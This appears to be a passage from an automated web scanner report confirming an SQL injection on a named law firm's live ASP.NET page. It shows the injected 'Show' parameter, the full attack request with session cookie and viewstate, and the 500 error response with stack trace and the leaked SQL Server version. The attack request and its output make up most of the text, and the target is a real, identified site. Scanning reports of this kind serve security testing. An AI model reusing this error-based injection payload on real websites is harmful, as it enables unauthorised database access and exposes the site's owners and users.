This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?PrintPage=True&Show=(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
PrintPage GET True
Show GET (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
sortby GET 3
by GET 3
title GET 3
related GET 3
__VIEWSTATE POST dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM Oz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA O2k8MT47PjtsPHQ8O2w8aTwzPjs O2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw DQpcPHAgYWxpZ249bGVmdFw XDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w RnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw DQpcPHAgYWxpZ249bGVmdFw XDwvaVw XDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w XDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw DQpcPHAgYWxpZ249bGVmdFw XDwvcFw DQpcPHAgYWxpZ249bGVmdFw TUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw OiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw DQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w DQpcPGRpdlw DQpcPGRpdlw DQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw DQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw Oz4 Oz47Oz47Pj47dDw7bDxpPDE Oz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4 Oz47Oz47Pj47Pj47Pj47PhAty6L 8bEAq44RzBhw7T/ELP 0

Extracted Data

microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation standard edition on windows nt 5.2 (build 3790: service pack 2)

Request

POST /new/showlocationnew.aspx?PrintPage=True&Show=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&sortby=3&by=3&title=3&related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/showlocationnew.aspx?PrintPage=True&Show=1433&sortby=&by=&title=&related=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Content-Length: 6698
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM%2bOz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA%2bO2k8MT47PjtsPHQ8O2w8aTwzPjs%2bO2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w%2bRnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvaVw%2bXDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w%2bXDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bTUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw%2bOiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw%2bDQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w%2bDQpcPGRpdlw%2bDQpcPGRpdlw%2bDQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw%2bDQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw%2bOz4%2bOz47Oz47Pj47dDw7bDxpPDE%2bOz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4%2bOz47Oz47Pj47Pj47Pj47PhAty6L%2b8bEAq44RzBhw7T%2fELP%2b0

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 17:47:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4176


<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.]
System.Data.SqlClient.SqlDataReader.Read() +176
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
